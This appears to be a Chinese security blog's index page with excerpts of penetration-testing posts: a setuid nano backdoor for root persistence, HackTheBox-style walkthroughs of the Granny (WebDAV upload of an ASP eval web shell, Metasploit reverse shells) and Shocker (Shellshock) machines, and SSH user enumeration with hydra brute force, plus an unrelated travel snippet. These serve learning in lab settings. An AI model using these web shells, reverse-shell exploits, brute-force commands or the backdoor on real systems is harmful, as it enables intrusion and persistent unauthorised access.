发表于 | 分类于

上一篇:权限管理

参考资料: https://gist.github.com/dergachev/7916152 、https://pentestlab.blog/tag/find/

为什么你不能做到,在一个已经被渗透的机器上禁止提权?

假设某人临时获得了root权限访问了你的系统,即使你禁止了提权的方式,他们仍然 有数不清的方式在以后重新访问你的系统。

简单提一下一些明显的方法:

  • 添加/root/.ssh/authorized_keys
  • 添加新用户
  • 运行恶意软件
  • 使用cron job定时任务

使用setuid可以使得任何用户运行root权限,而且你甚至不知道系统是否被入侵过。

案例:nano

1
2
3
4
5
6
7
ssh root@target

whoami                 #    root
ls -al /bin/nano       #    -rwxr-xr-x 1 root root 191976 2010-02-01 20:30 /bin/nano

chmod u+s /bin/nano    # installs the backdoor

4

一旦nano 后门被设置,之后hacker可以用非root用户获取到root权限。

例如:nano /root/.ssh/authorized_keys

  • 一旦系统被黑,特别是获取到root权限,你就再也不能信任它了。你必须找到源头漏洞在哪里, 然后用一个干净的系统重置,并且打上补丁。

  • 通常,你不能允许任何不信任的组织使用shell连入系统,因为你可能对linux漏洞的知识不精通。

检查suid的bash script

1
2
3
4
5
#!/bin/bash
cd /tmp
find / -perm -4000 2>/dev/null > examSUID.txt
cat examSUID.txt | grep -E "nmap|vim|find|bash|more|less|nano|cp"
rm /tmp/examSUID.txt

5

阅读全文 »

发表于 | 分类于

10.10.10.15

scan

1
2
3
4
5
6
7
8
80/tcp open  http    Microsoft IIS httpd 6.0

http-webdav-scan: 
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   Server Type: Microsoft-IIS/6.0
|   WebDAV type: Unkown
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|_  Server Date: Mon, 18 Feb 2019 11:05:15 GMT

搜索关键字“WebDAV”,检查一下 “Microsoft IIS WebDAV Write Access Code Execution”

trying1

nikto -h 10.10.10.15

1
2
3
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.

参考资料:https://www.cnblogs.com/cnhacker/p/6999102.html curl常用方法

创建了1.html,成功 curl -X PUT http://10.10.10.15/1.html -d “abcdef”

准备将php一句话写入1.html,失败

1
2
curl -X PUT http://10.10.10.15/1.html -d "<?php system($_GET['cmd']) ?>"
curl -X MOVE --header 'Destination:http://10.10.10.15/1.html' 'http://10.10.10.15/1.php'

(nikto扫描结果)发现iis 用的是asp,而不是php.

1
2
curl -X PUT http://10.10.10.15/1.html -d " <%eval request("cmd")%> "
curl -X MOVE --header 'Destination:http://10.10.10.15/1.asp' http://10.10.10.15/1.html

msf:获得一个shell

job.rc :

1
2
3
4
use exploit/windows/iis/iis_webdav_upload_asp
set RHOST 10.10.10.15
set LHOST 10.10.14.3
run

msfconsole -r job.rc

3

info:

Windows Server 2003

1
2
3
4
5
6
7
User accounts for \GRANNY

-------------------------------------------------------------------------------
Administrator            ASPNET                   Guest                    
IUSR_GRANPA              IWAM_GRANPA              Lakis                    
SUPPORT_388945a0         
The command completed successfully.

尝试提权

exp提权

依次尝试suggerser提示的exp,全部失败

1
2
3
4
5
6
7
8
9
10
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms16_032: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

4

writeup

之前使用getuid命令,但是结果报错,还以为是权限不够。

msf进程存在于内存之中,以下命令将进程迁移为稳定进程,再使用getuid命令,就不会报错了。

1
2
3
4
5
6
7
8
9
10
background
use post/windows/manage/migrate
set SESSION 1
run

use exploit/windows/local/ppr_flatten_rec
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.14.7
set LPORT 8899
set SESSION 1

总结

失败的提示

1
2
3
4
5
6
7
8
9
[*] Started reverse TCP handler on 10.10.14.7:8899 
[*] Launching notepad to host the exploit...
[+] Process 208 launched.
[*] Reflectively injecting the exploit DLL into 208...
[*] Injecting exploit into 208 ...
[*] Exploit injected. Injecting payload into 208...
[*] Payload injected. Executing exploit...
[*] Exploit thread executing (can take a while to run), waiting 30 sec ...
[*] Exploit completed, but no session was created.

waiting 30 sec,当看到这个提示,于是执行失败以后,输入以下命令。

1
set wait 20
阅读全文 »

发表于 | 分类于

10.10.10.56

1
2
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)

1

访问web,是一个单纯的图片,查看源码无发现。

2

目录扫描ing. 两个目录403,未发现其他目录

3

低版本目录枚举:

1
2
3
4
5
6
7
8
ssh -p 2222 root@10.10.10.56

python ssh.py --port 2222 --username root 10.10.10.56
/usr/lib/python2.7/dist-packages/paramiko/rsakey.py:119: CryptographyDeprecationWarning: signer and verifier have been deprecated. Please use sign and verify instead.
  algorithm=hashes.SHA1(),
/usr/lib/python2.7/dist-packages/paramiko/rsakey.py:99: CryptographyDeprecationWarning: signer and verifier have been deprecated. Please use sign and verify instead.
  algorithm=hashes.SHA1(),
root is a valid user!

经过以上探测,没有发现任何攻击路径,然后找一下中间件版本漏洞。

4

Apache HTTPD信息泄露漏洞(CVE-2016-4979) 没发现可以exp

5

1
2
3
4
Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak                                                      | exploits/linux/webapps/42745.py

python3 42745.py -u http://10.10.10.56 -a
[ok] http://10.10.10.56: 'GET,HEAD,POST,OPTIONS'

6

nikto -h 10.10.10.56

nessus scan扫描都没有发现漏洞,尤其是目标主机名称为“Shocker”,我特地使用了Bash Shellshock Detection策略。

1
This policy is used to perform remote checks for the Shellshock vulnerability (CVE-2014-6271) via HTTP, FTP, SMTP, telnet, and SIP. SSH credentials can optionally be provided to test for CVE-2014-6271 via SSH and enumerate missing software updates for CVE-2014-6271 and CVE-2014-7291.

writeup

目录枚举发现/user.sh,下载后内容如下:

1
2
3
4
5
Content-Type: text/plain

Just an uptime test script

 01:13:47 up 6 days,  3:07,  0 users,  load average: 0.00, 0.00, 0.00

确认apache服务使用了cgi(通用网关接口),可以调用Linux的 bash shell。

job.rc

1
2
3
4
5
6
7
8
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOST 10.10.10.56
set TARGETURI /cgi-bin/user.sh
set SRVHOST 10.10.14.17
set SRVPORT 7788
set payload linux/x64/meterpreter/reverse_tcp
set target 1
run

1
2
3
4
5
6
7
8
getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
sysinfo
Computer     : 10.10.10.56
OS           : Ubuntu 16.04 (Linux 4.4.0-96-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux

观察到meterpreter构架为86,于是更改一下payload和target。

提权

1
2
3
4
5
6
7
8
9
background
search suggester
use post/multi/recon/local_exploit_suggester
set SESSION 3
run

[+] 10.10.10.56 - exploit/linux/local/bpf_priv_esc: The target appears to be vulnerable.
[+] 10.10.10.56 - exploit/linux/local/bpf_sign_extension_priv_esc: The target appears to be vulnerable.
[+] 10.10.10.56 - exploit/linux/local/glibc_realpath_priv_esc: The target appears to be vulnerable.

2

总结

shellshock漏洞介绍:

1
2
3
4
5
6
7
   1)Linux WEB Server一般可以提供CGI接口,允许远程执行Bash命令;

   2)对于HTTP头部,CGI脚本解析器会将其当作环境变量,调用bash的env相关函数设置到临时环境变量中;

   3)HTTP协议允许发送任意客户端自定义的HTTP头部;

   4)这样就产生了一个完整的可供Bash命令注入的场景,客户端故意发送构造好的带攻击命令的HTTP头部到服务端,服务端调用设置环境变量的函数,直接执行了客户端指定的头部里面的命令。并且还会将结果一并返回给客户端。
阅读全文 »

发表于 | 分类于

坐过飞机,搭上巴士,再转小汽车,跨越上千公里,我又回到了山中外婆家。如果是在宫崎骏的动画里,远离城市的乡村应该画的很美吧。可惜不是,外婆住的地方靠近一个 大坝,除了一条河一条公路,什么也没有。。

阅读全文 »

发表于 | 分类于 
1
2
3
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
111/tcp open  rpcbind 2-4 (RPC #100000)

try1-ssh用户枚举

1
2
3
python ssh.py --userList /usr/share/wordlists/linux-user.txt --outputFile out.txt 192.168.2.133
cat out.txt | grep -v 'not' > name.txt
awk '{print $1}' name.txt > user.txt

获得的用户:

1
2
3
michael
steven
......

hydra -L user.txt -P /usr/share/wordlists/rockyou.txt -I 192.168.2.133 ssh

阅读全文 »